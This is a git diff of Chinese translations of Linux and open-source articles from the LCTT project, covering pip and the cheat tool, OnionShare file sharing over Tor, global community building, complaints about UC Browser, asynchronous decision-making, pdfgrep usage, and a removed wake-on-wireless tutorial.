**`RHEL/CentOS`** 官方仓库中没有 pip,因此使用[ EPEL 仓库][5],并使用[ YUM 命令][6]安装 pip。
|
||||
|
||||
```
|
||||
|
||||
@ -50,62 +39,61 @@ enable [EPEL Repository][5] and use [YUM command][6] to install pip.
|
||||
|
||||
```
|
||||
|
||||
For **`Fedora`** system, use [dnf Command][7] to install pip.
|
||||
对于 **`Fedora`** 系统,使用[ dnf 命令][7]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo dnf install python-pip
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo dnf install python3
|
||||
|
||||
```
|
||||
|
||||
For **`Arch Linux`** based systems, use [Pacman Command][8] to install pip.
|
||||
对于基于 **`Arch Linux`** 的系统,请使用[ Pacman 命令][8] 来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo pacman -S python2-pip python-setuptools
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo pacman -S python-pip python3-setuptools
|
||||
|
||||
```
|
||||
|
||||
For **`openSUSE`** system, use [Zypper Command][9] to install pip.
|
||||
对于 **`openSUSE`** 系统,使用[ Zypper 命令][9]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo zypper install python-pip
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo zypper install python3-pip
|
||||
|
||||
```
|
||||
|
||||
pip is a python module bundled with setuptools, it's one of the recommended
|
||||
tool for installing Python packages in Linux.
|
||||
pip 是一个与 setuptools 捆绑在一起的 Python 模块,它是在 Linux 中安装 Python 包推荐的工具之一。
|
||||
|
||||
```
|
||||
|
||||
@ -113,10 +101,9 @@ tool for installing Python packages in Linux.
|
||||
|
||||
```
|
||||
|
||||
#### How to Use Cheat
|
||||
#### 如何使用 Cheat
|
||||
|
||||
Run `cheat` followed by corresponding `command` to view the cheatsheet, For
|
||||
demonstration purpose, we are going to check about `tar` command examples.
|
||||
运行 `cheat`,然后按相应的`命令`来查看 cheatsheet,作为例子,我们要来看下 `tar` 命令的例子。
|
||||
|
||||
```
|
||||
|
||||
@ -158,7 +145,7 @@ demonstration purpose, we are going to check about `tar` command examples.
|
||||
|
||||
```
|
||||
|
||||
Run the following command to see what cheatsheets are available.
|
||||
运行下面的命令查看可用的 cheatsheet。
|
||||
|
||||
```
|
||||
|
||||
@ -166,7 +153,7 @@ Run the following command to see what cheatsheets are available.
|
||||
|
||||
```
|
||||
|
||||
Navigate to help page for more details.
|
||||
进入帮助页面获取更多详细信息。
|
||||
|
||||
```
|
||||
|
||||
@ -180,7 +167,7 @@ Navigate to help page for more details.
|
||||
via: https://www.2daygeek.com/cheat-a-collection-of-practical-linux-command-examples/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,77 @@
|
||||
OnionShare - 匿名共享文件
|
||||
======
|
||||
在这个数字世界中,我们通过互联网使用 Dropbox、Mega、Google Drive 等不同云存储分享我们的媒体、文档和重要文件。但是每个云存储都有两个主要问题,一个是大小,另一个是安全。习惯 Bit Torrent 之后,大小已经不是问题了,但安全性仍旧是。
|
||||
|
||||
你即使通过安全云服务发送文件,公司也会注意到这些文件,如果这些文件是保密的,政府甚至可以拥有它们。因此,为了克服这些问题,我们使用 OnionShare,如它的名字那样它使用洋葱网络也就是 Tor 来匿名分享文件给任何人。
|
||||
|
||||
### 如何使用 **OnionShare**?
|
||||
|
||||
* 首先下载 [OnionShare][1] 和 [Tor浏览器][2]。下载后安装它们。
|
||||
|
||||
|
||||
|
||||
[![install onionshare and tor browser][3]][3]
|
||||
|
||||
* 现在从开始菜单打开 OnionShare
|
||||
|
||||
|
||||
|
||||
[![onionshare share files anonymously][4]][4]
|
||||
|
||||
* 点击添加并添加一个文件/文件夹共享。
|
||||
* 点击开始分享。它会产生一个 .onion 网址,你可以与你的收件人分享这个网址。
|
||||
|
||||
|
||||
|
||||
[![share file with onionshare anonymously][5]][5]
|
||||
|
||||
* 从 URL 下载文件,复制 URL 并打开 Tor 浏览器并粘贴。打开 URL 并下载文件/文件夹。
|
||||
|
||||
|
||||
|
||||
[![receive file with onionshare anonymously][6]][6]
|
||||
|
||||
### **OnionShare** 的开始
|
||||
|
||||
几年前,Glenn Greenwald 发现他从 Edward Snowden 收到的一些 NSA 的文件已经被损坏。但他需要文件,并决定通过使用 USB 获取文件。这并不成功。
|
||||
|
||||
在阅读了 Greenwald 写的书后,The Intercept 的安全专家 Micah Lee 发布了 OnionShare - 一个简单的免费软件,可以匿名和安全地共享文件。他创建了一个程序,通过一个被匿名软件 Tor 加密和保护的直接通道来共享大数据转储,使窃取者难以获取文件。
|
||||
|
||||
### **OnionShare** 如何工作?
|
||||
|
||||
OnionShare 在 127.0.0.1 上启动了一个 Web 服务器,用于在随机端口上共享文件。它从有 6880 个单词的单词列表中选择任意两个单词,称为 slug。它使服务器可以作为 Tor 洋葱服务发送文件。最终的 URL 看起来像这样:
|
||||
|
||||
`http://qx2d7lctsnqwfdxh.onion/subside-durable`
|
||||
|
||||
OnionShare 在下载后关闭。有一个选项允许多次下载文件。这使得该文件不再在互联网上可以得到。
|
||||
|
||||
### 使用 **OnionShare** 好处
|
||||
|
||||
其他网站或程序无法访问你的文件:发件人使用 OnionShare 共享的文件不存储在任何服务器上。它直接托管在发件人的系统上。
|
||||
|
||||
没有人可以窥探共享文件:由于用户之间的连接是由洋葱服务和 Tor 浏览器加密的。这使得连接安全,很难窃取文件。
|
||||
|
||||
用户双方都是匿名的:OnionShare 和 Tor 浏览器使发件人和收件人匿名。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我已经解释了如何**匿名分享你的文档、文件**。我也解释了它是如何工作的。希望你了解 OnionShare 是如何工作的,如果你对任何事情仍有疑问,只需留言。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/onionshare-share-files-anonymously-2
|
||||
|
||||
作者:[Anirudh Rayapeddi][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com
|
||||
[1]:https://onionshare.org/
|
||||
[2]:https://www.torproject.org/projects/torbrowser.html.en
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png
|
||||
[6]:http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png
|
@ -0,0 +1,70 @@
|
||||
构建全球社区带来的挑战
|
||||
======
|
||||
![配图 ](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY)
|
||||
|
||||
今天的开源组织参与人员来自于全世界。你能预见到组建在线社区可能遇到哪些困难吗?有没有什么办法能够克服这些困难呢?
|
||||
|
||||
为开源社区贡献力量的人共同合作推动软件的开发和发展 (People contributing to an open source community share a commitment to the software they're helping to develop)。在过去,人们是面对面或者通过邮件和电话来交流的。今天,科技孕育出了在线交流--人们只需要进入一个聊天室或消息渠道就能一起工作了。比如,你可以早上跟摩洛哥的人一起工作,到了晚上又跟夏威夷的人一起工作。
|
||||
|
||||
## 全球社区的三个挑战
|
||||
|
||||
任何一个团队合作过的人都知道意见分歧是很难被克服的。对于在线社区来说,语言障碍,不同的时区,以及文化差异也带来了新的挑战。
|
||||
|
||||
### 语言障碍
|
||||
|
||||
英语是开源社区中的主流语言,因此英语不好的人会很难看懂文档和修改意见。为了克服这个问题,吸引其他地区的社区成员,你需要邀请双语者参与到社区中来。问问周围的人--你会发现意想不到的精通其他语言的人。社区的双语成员可以帮助别人跨越语言障碍,并且可以通过翻译软件和文档来扩大项目的受众范围。
|
||||
|
||||
人们使用的编程语言也不一样。你可能喜欢用 Bash 而其他人则可能更喜欢 Python,Ruby,C 等其他语言。这意味着,人们可能由于编程语言的原因而难以为你的代码库做贡献。项目负责人为项目选择一门被软件社区广泛认可的语言至关重要。如果你选择了一门偏门的语言,则很少人能够参与其中。
|
||||
|
||||
### 不同的时区
|
||||
|
||||
时区为开源社区带来了另一个挑战。比如,若你在芝加哥,想与一个在伦敦的成员安排一次视频会议,你需要调整 8 小时的时差。根据合作者的地理位置,你可能要在深夜或者清晨工作。
|
||||
|
||||
实地冲刺 (Physical sprints),让你的团队在同一个时区工作可以帮助克服这个挑战,但这种方法只有极少数社区才能够负担得起。我们还可以定期举行虚拟会议讨论项目,建立一个固定的时间和地点以供所有人来讨论未决的事项,即将发布的版本等其他主题。
|
||||
|
||||
不同的时区也可以成为你的优势,因为团队成员可以全天候的工作。若你拥有一个类似 IRC 这样的实时交流平台,用户可以在任意时间都能找到人来回答问题。
|
||||
|
||||
### 文化差异
|
||||
|
||||
文化差异是开源组织面临的最大挑战。世界各地的人都有不同的思考方式,计划以及解决问题的方法。政治环境也会影响工作环境并影响决策。
|
||||
|
||||
作为项目负责人,你应该努力构建一种能包容不同看法的环境。文化差异可以鼓励社区沟通。建设性的讨论总是对项目有益,因为它可以帮助社区成员从不同角度看待问题。不同意见也有助于解决问题。
|
||||
|
||||
要成功开源,团队必须学会拥抱差异。这不简单,但多样性最终会使社区受益。
|
||||
|
||||
## 加强在线沟通的其他方法
|
||||
|
||||
**本地化:** 在线社区成员可能会发现位于附近的贡献者--去见个面并组织一个本地社区。只需要两个人就能组建一个社区了。可以邀请其他当地用户或雇员参与其中; 他们甚至还能为以后的聚会提供场所呢。
|
||||
|
||||
**组织活动:** 组织活动是构建本地社区的好方法,而且费用也不高。你可以在当地的咖啡屋或者啤酒厂聚会,庆祝最新版本的发布或者某个核心功能的实现。组织的活动越多,人们参与的热情就越高(即使只是因为单纯的好奇心)。最终,可能会找到一家公司为你提供聚会的场地,或者为你提供赞助。
|
||||
|
||||
**保持联系:** 每次活动后,联系本地社区成员。收集电子邮箱地址或者其他联系方式并邀请他们参与到你的交流平台中。邀请他们为其他社区做贡献。你很可能会发现很多当地的人才,运气好的话,甚至可能发现新的核心开发人员!
|
||||
|
||||
**分享经验:** 本地社区是一种非常有价值的资源,对你,对其他社区来说都是。与可能受益的人分享你的发现和经验。如果你不清楚(译者注:这里原文是说 sure,但是根据上下文,这里应该是 not sure) 如何策划一场活动或会议,可以咨询其他人的意见。也许能找到一些有经验的人帮你走到正轨。
|
||||
|
||||
**关注文化差异:** 记住,文化规范因地点和人口而异,因此在清晨安排某项活动可能适用于一个地方的人,但是不合适另一个地方的人。当然,你可以--也应该--利用其他社区的参考资料来更好地理解这种差异性,但有时你也需要通过试错的方式来学习。不要忘了分享你所学到的东西,让别人也从中获益。
|
||||
|
||||
**检查个人观点:** 避免在工作场合提出带有很强主观色彩的观点(尤其是与政治相关的观点)。这会抑制开放式的沟通和问题的解决。相反,应该专注于鼓励与团队成员展开建设性讨论。如果你发现陷入了激烈的争论中,那么后退一步,冷静一下,然后再从更加积极的角度出发重新进行讨论。讨论必须是有建设性的,从多个角度讨论问题对社区有益。永远不要把自己的主观观念放在社区的总体利益之前。
|
||||
|
||||
**尝试异步沟通:** 这些天,实时通讯平台已经引起了大家的关注,但除此之外还别忘了电子邮件。如果没有在网络平台上找到人的话,可以给他们发送一封电子邮件。有可能你很快就能得到回复。考虑使用那些专注于异步沟通的平台,比如 [Twist][1],也不要忘了查看并更新论坛和维基。
|
||||
|
||||
**使用不同的解决方案:** 并不存在一个单一的完美的解决方法,学习最有效的方法还是通过经验来学习。从反复试验中你可以学到很多东西。不要害怕失败; 你会从失败中学到很多东西从而不停地进步。
|
||||
|
||||
## 社区需要营养
|
||||
|
||||
将社区想象成是一颗植物的幼苗。你需要每天给它浇水,提供阳光和氧气。社区也是一样:倾听贡献者的声音,记住你在与活生生的人进行互动,他们需要以合适的方式进行持续的交流。如果社区缺少了人情味,人们会停止对它的贡献。
|
||||
|
||||
最后,请记住,每个社区都是不同的,没有一种单一的解决方法能够适用于所有社区。坚持不断地从社区中学习并适应这个社区。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/working-worldwide-communities
|
||||
|
||||
作者:[José Antonio Rey][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jose
|
||||
[1]:https://twistapp.com
|
@ -0,0 +1,65 @@
|
||||
UC 浏览器最大的问题
|
||||
======
|
||||
在我们开始谈论缺点之前,我要确定的事实是过去 3 年来,我一直是一个忠实的 UC 浏览器用户。我真的很喜欢它的下载速度,超时尚的用户界面和工具上引人注目的图标。我一开始是 Android 上的 Chrome 用户,但我在朋友的推荐下开始使用 UC。但在过去的一年左右,我看到了一些东西让我重新思考我的选择,现在我感觉我要重新回到 Chrome。
|
||||
|
||||
### 不需要的 **通知**
|
||||
|
||||
我相信我不是唯一一个每几个小时内就收到这些不需要的通知的人。这些欺骗点击文章真的很糟糕,最糟糕的部分是你每隔几个小时就会收到一次。
|
||||
|
||||
[![uc browser's annoying ads notifications][1]][1]
|
||||
|
||||
我试图从通知设置里关闭他们,但它们仍然以一个更低频率出现。
|
||||
|
||||
### **新闻主页**
|
||||
|
||||
另一个不需要的部分是完全无用的。我们完全理解 UC 浏览器是免费下载,可能需要资金,但并不应该这么做。这个主页上的新闻文章是非常让人分心且不需要的。有时当你在一个专业或家庭环境中的一些诱骗点击甚至可能会导致尴尬。
|
||||
|
||||
[![uc browser's embarrassing news homepage][2]][2]
|
||||
|
||||
而且他们甚至有这样的设置。将 **UC** **新闻显示打开/关闭**。我也试过,猜猜看发生了什么。在下图中,左侧你可以看到我的尝试,右侧可以看到结果。
|
||||
|
||||
[![uc browser homepage settings][3]][3]
|
||||
|
||||
而且不止诱骗点击新闻,他们已经开始添加一些不必要的功能。所以我也列出它们。
|
||||
|
||||
### UC **音乐**
|
||||
|
||||
UC 浏览器在浏览器中集成了一个**音乐播放器**来播放音乐。它只是能用,没什么特别的东西。那为什么还要呢?有什么原因呢?谁需要浏览器中的音乐播放器?
|
||||
|
||||
[![uc browser adds uc music player][4]][4]
|
||||
|
||||
它甚至不是在后台直接播放来自网络的音频。相反,它是一个播放离线音乐的音乐播放器。所以为什么要它?我的意思是,它甚至不够好到作为主要音乐播放器。即使它是,它也不能独立于 UC 浏览器运行。所以为什么会有人为了使用音乐播放器而去运行浏览器呢?
|
||||
|
||||
### **快速**访问栏
|
||||
|
||||
我已经看到平均有 90% 的用户在通知区域挂着这栏,因为它默认安装,并且它们不知道如何摆脱它。右侧的设置可以摆脱它。
|
||||
|
||||
[![uc browser annoying quick access bar][5]][5]
|
||||
|
||||
但是我还是想问一下,“为什么它是默认的?”。这让大多数用户很头痛。如果我们需要它,就会去启用它。为什么要强迫用户。
|
||||
|
||||
### 总结
|
||||
|
||||
UC 浏览器仍然是最大的玩家之一。它提供了一个最好的体验,但是,我不知道 UC 通过在浏览器中打包进越来越多的功能并强迫用户使用它们是要证明什么。
|
||||
|
||||
我喜欢 UC 的速度和设计。但最近的体验导致我再次考虑我的主要浏览器。
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/biggest-problems-uc-browser
|
||||
|
||||
作者:[Rishabh Kandari][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com/author/reevkandari
|
||||
[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png
|
||||
[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png
|
||||
|
@ -0,0 +1,56 @@
|
||||
异步决策:帮助远程团队走向成功
|
||||
======
|
||||
异步决策能够让地理和文化上分散的软件团队更有效率地做出决策。本文就将讨论一下实现异步决策所需要的一些原则和工具。
|
||||
|
||||
同步决策,要求参与者实时地进行互动,而这对那些需要大块完整时间工作 ([Maker's Schedule][1]) 的人来说代价非常大,而且对于远程团队来说这也不现实。我们会发现这种会议最后浪费的时间让人难以置信。
|
||||
|
||||
相比之下,异步决策常应用于大型开源项目中(比如我常参与的像 Apache Software Foundation (ASF))。它为团队提供了一种尽可能少开会的有效方法。很多开源项目每年只开很少的几次会议(有的甚至完全没开过会),然而开发团队却始终如一地在生产高质量的软件。
|
||||
|
||||
怎样才能异步决策呢?
|
||||
|
||||
## 所需工具
|
||||
|
||||
### 中心化的异步沟通渠道
|
||||
|
||||
异步决策的第一步就是构建一个中心化的异步沟通渠道。你所使用的技术必须能让所有的团队成员都获得同样的信息,并能进行线索讨论 (threaded discussions),也就是说你要既能对一个主题进行发散也要能封禁其他主题的讨论。想一想海事广播,其中广播渠道的作用只是为了引起特定人员的注意,这些人然后再创建一个子渠道来进行详细的讨论。
|
||||
|
||||
很多开源项目依旧使用邮件列表 (mailing lists) 作为中心渠道,不过很多新一代的软件开发者可能会觉得这个方法又古老又笨拙。邮件列表需要遵循大量的准则才能有效的管理热门项目,比如你需要进行有意义的引用,每个 thread 只讨论一个主题,保证 [标题与内容相吻合 ][2]。虽然这么麻烦,但使用得当的话,再加上一个经过索引的归档系统,邮件列表依然在创建中心渠道的工具中占据绝对主导的地位。
|
||||
|
||||
公司团队可以从一个更加现代化的协作工具中受益,这类工具更易使用并提供了更加强大的多媒体功能。不管你用的是哪个工具,关键在于要创建一个能让大量的人员有效沟通并异步地讨论各种主题的渠道。要创建一个一致而活跃的社区,使用一个 [繁忙的渠道要好过建立多个渠道 ][3]。
|
||||
|
||||
### 构建共识的机制
|
||||
|
||||
第二个工具是一套构建共识的机制,这样你才不会陷入死循环从而确保能做出决策。做决策最理想的情况就是一致同意,而次佳的就是达成共识,也就是 "有决策权的人之间广泛形成了一致的看法"。强求完全一致的赞同或者允许一票否决都会阻碍决策的制定,因此 ASF 中只在非常有限的决策类型中允许否决权。[ASF 投票制度 ][4] 为类似 ASF 这样没有大老板的松散组织构建了一个久经考验的,用于达成共识的好方法。当共识无法自然产生时也可以使用该套制度。
|
||||
|
||||
### 案例管理系统
|
||||
|
||||
如上所述,我们通常在项目的中心渠道中构建共识。但是在讨论一些复杂的话题时,使用案例管理系统这一第三方的工具很有意义。小组可以使用中心渠道专注于非正式的讨论和头脑风暴上,当讨论要转变成一个决策时将其转到一个更加结构化的案例管理系统中去。
|
||||
|
||||
案例管理系统能够更精确地组织决策。小型团队不用做太多决策可以不需要它,但很多团队会发现能有一个相对独立的地方讨论决策的细节并保存相关信息会方便很多。
|
||||
|
||||
案例管理系统不一定就是个很复杂的软件; 在 ASF 中我们所使用的只是简单的问题跟踪软件而已,这些给予 web 的系统原本是创建来进行软件支持和 bug 管理的。每个案例列在一个单独的 web 页面上,还有一些历史的注释和动作信息。该途径可以很好的追踪决策是怎么制定出来的。比如,某些非紧急的决策或者复杂的决策可能会花很长时间才会制定出来,这时有一个地方能够了解这些决策的历史就很有用了。新来的团队成员也能很快地了解到最近做出了哪些决策,哪些决策还在讨论,每个决策都有那些人参与其中,每个决策的背景是什么。
|
||||
|
||||
## 成功的案例
|
||||
|
||||
ASF 董事会中的九名董事在每个月的电话会议上只做很少的一些决策,耗时不超过 2 个小时。在准备这些会议之前大多数的决策都预先通过异步的方式决定好了。这使得我们可以在会议上集中讨论复杂和难以确定的问题,而不是讨论那些已经达成普遍/部分共识的问题。
|
||||
|
||||
软件世界外的一个有趣的案例是 [瑞士联邦委员会的周会 ][5],它的运作方式跟 ASF 很类似。团队以异步决策构建共识的方式来准备会议。会议议程由一组不同颜色编码的列表组成,这些颜色标识了哪些事项可以很快通过批准,哪些事项需要进一步的讨论,哪些事项特别的复杂。这使得只要 7 个人就能每年忙完超过 2500 项决策,共 50 个周会,每个周会只需要几个小时时间。我觉得这个效率已经很高了。
|
||||
|
||||
就我的经验来看,异步决策带来的好处完全值得上为此投入的时间和工具。而且它也能让团队成员更快乐,这也是成功的关键因素之一。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/asynchronous-decision-making
|
||||
|
||||
作者:[Bertrand Delacretaz][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com
|
||||
[1]:http://www.paulgraham.com/makersschedule.html
|
||||
[2]:https://grep.codeconsult.ch/2017/11/10/large-mailing-lists-survival-guide/
|
||||
[3]:https://grep.codeconsult.ch/2011/12/06/stefanos-mazzocchis-busy-list-pattern/
|
||||
[4]:http://www.apache.org/foundation/voting.html
|
||||
[5]:https://www.admin.ch/gov/en/start/federal-council/tasks/decision-making/federal-council-meeting.html
|
@ -0,0 +1,64 @@
|
||||
如何使用 pdfgrep 从终端搜索 PDF 文件
|
||||
======
|
||||
诸如 [grep][1] 和 [ack-grep][2] 之类的命令行工具对于搜索匹配指定[正则表达式][3]的纯文本非常有用。但是你有没有试过使用这些工具在 PDF 中搜索模板?不要这么做!由于这些工具无法读取PDF文件,因此你不会得到任何结果。他们只能读取纯文本文件。
|
||||
|
||||
顾名思义,[pdfgrep][4] 是一个小的命令行程序,可以在不打开文件的情况下搜索 PDF 中的文本。它非常快速 - 比几乎所有 PDF 浏览器提供的搜索更快。grep 和 pdfgrep 的区别在于 pdfgrep 对页进行操作,而 grep 对行操作。grep 如果在一行上找到多个匹配项,它也会多次打印单行。让我们看看如何使用该工具。
|
||||
|
||||
对于 Ubuntu 和其他基于 Ubuntu 的 Linux 发行版来说,这非常简单:
|
||||
```
|
||||
sudo apt install pdfgrep
|
||||
```
|
||||
|
||||
对于其他发行版,只要将 `pdfgrep` 作为[包管理器][5]的输入,它就应该能够安装。万一你想浏览代码,你也可以查看项目的[ GitLab 页面][6]。
|
||||
|
||||
现在你已经安装了这个工具,让我们去测试一下。pdfgrep 命令采用以下格式:
|
||||
```
|
||||
pdfgrep [OPTION...] PATTERN [FILE...]
|
||||
```
|
||||
|
||||
**OPTION** 是一个额外的属性列表,给出诸如 `-i` 或 `--ignore-case` 这样的命令,这两者都会忽略匹配正则中的大小写。
|
||||
|
||||
**PATTERN** 是一个扩展的正则表达式。
|
||||
|
||||
**FILE** 是文件的名称;如果文件不在当前工作目录下,则需要给出文件的路径。
|
||||
|
||||
我根据官方文档用 Python 3.6 运行命令。下图是结果。
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
红色高亮显示所有遇到单词 “queue” 的地方。在命令中加入 `-i` 选项将会匹配单词 “Queue”。请记住,当加入 `-i` 时,大小写并不重要。
|
||||
|
||||
pdfgrep 有相当多的有趣的选项。不过,我只会在这里介绍几个。
|
||||
|
||||
|
||||
* `-c` 或者 `--count`:这会抑制匹配的正常输出。它只显示在文件中遇到该单词的次数,而不是显示匹配的长输出,
|
||||
* `-p` 或者 `--page-count`:这个选项打印页面上匹配的页码和页面上的模式出现次数
|
||||
* `-m` 或者 `--max-count` [number]:指定匹配的最大数目。这意味着当达到匹配次数时,该命令停止读取文件。
|
||||
|
||||
|
||||
|
||||
支持的选项的完整列表可以在 man 页面或者 pdfgrep 在线[文档][8]中找到。以防你在处理一些批量文件,不要忘记,pdfgrep 可以同时搜索多个文件。可以通过更改 GREP_COLORS 环境变量来更改默认的匹配高亮颜色。
|
||||
|
||||
下一次你想在 PDF 中搜索一些东西。请考虑使用 pdfgrep。该工具会派上用场,并且节省你的时间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1]:https://www.maketecheasier.com/what-is-grep-and-uses/
|
||||
[2]:https://www.maketecheasier.com/ack-a-better-grep/
|
||||
[3]:https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/
|
||||
[4]:https://pdfgrep.org/
|
||||
[5]:https://www.maketecheasier.com/install-software-in-various-linux-distros/
|
||||
[6]:https://gitlab.com/pdfgrep/pdfgrep
|
||||
[7]:https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search)
|
||||
[8]:https://pdfgrep.org/doc.html
|
@ -1,116 +0,0 @@
|
||||
如何为 Linux 无线网卡配置无线唤醒功能
|
||||
======
|
||||
[![linux-configire-wake-on-wireless-lan-wowlan][1]][1]
|
||||
无线唤醒 (WoWLAN or WoW) 允许 Linux 系统在进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点保持连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。
|
||||
|
||||
请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。
|
||||
|
||||
## 语法
|
||||
|
||||
在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其语法为:
|
||||
```
|
||||
iw command
|
||||
iw [options] command
|
||||
```
|
||||
|
||||
## 列出所有的无线设备及其功能
|
||||
|
||||
输入下面命令:
|
||||
```
|
||||
$ iw list
|
||||
$ iw list | more
|
||||
$ iw dev
|
||||
```
|
||||
输出为:
|
||||
```
|
||||
phy#0
|
||||
Interface wlp3s0
|
||||
ifindex 3
|
||||
wdev 0x1
|
||||
addr 6c:88:14:ff:36:d0
|
||||
type managed
|
||||
channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz
|
||||
txpower 15.00 dBm
|
||||
|
||||
```
|
||||
|
||||
请记下这个 phy0。
|
||||
|
||||
## 查看 wowlan 的当前状态
|
||||
|
||||
打开终端并输入下面命令来查看无线网络的状态:
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
输出为:
|
||||
```
|
||||
WoWLAN is disabled
|
||||
```
|
||||
|
||||
## 如何启用 wowlan
|
||||
|
||||
启用的语法为:
|
||||
`sudo iw phy {phyname} wowlan enable {option}`
|
||||
其中,
|
||||
|
||||
1。{phyname} - 使用 iw dev 来获取 phy 的名字。
|
||||
2。{option} - 可以是 any, disconnect, magic-packet 等。
|
||||
|
||||
|
||||
|
||||
比如,我想为 phy0 开启 wowlan:
|
||||
`$ sudo iw phy0 wowlan enable any`
|
||||
或者
|
||||
`$ sudo iw phy0 wowlan enable magic-packet disconnect`
|
||||
检查一下:
|
||||
`$ iw phy0 wowlan show`
|
||||
结果为:
|
||||
```
|
||||
WoWLAN is enabled:
|
||||
* wake up on disconnect
|
||||
* wake up on magic packet
|
||||
|
||||
```
|
||||
|
||||
## 测试一下
|
||||
|
||||
将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet:
|
||||
`$ sudo sh -c 'echo mem > /sys/power/state'`
|
||||
从 NAS 服务器上使用 [ping command][3] 发送 ping 请求
|
||||
`$ ping your-laptop-ip`
|
||||
也可以 [使用 wakeonlan 命令发送 magic packet][4]:
|
||||
```
|
||||
$ wakeonlan laptop-mac-address-here
|
||||
$ etherwake MAC-Address-Here
|
||||
```
|
||||
|
||||
## 如何禁用 WoWLAN?
|
||||
|
||||
语法为:
|
||||
```
|
||||
$ sudo iw phy {phyname} wowlan disable
|
||||
$ sudo iw phy0 wowlan disable
|
||||
```
|
||||
|
||||
更多信息请阅读 iw 命令的 man 页:
|
||||
```
|
||||
$ man iw
|
||||
$ iw --help
|
||||
```
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://twitter.com/nixcraft
|
||||
[1]:https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg
|
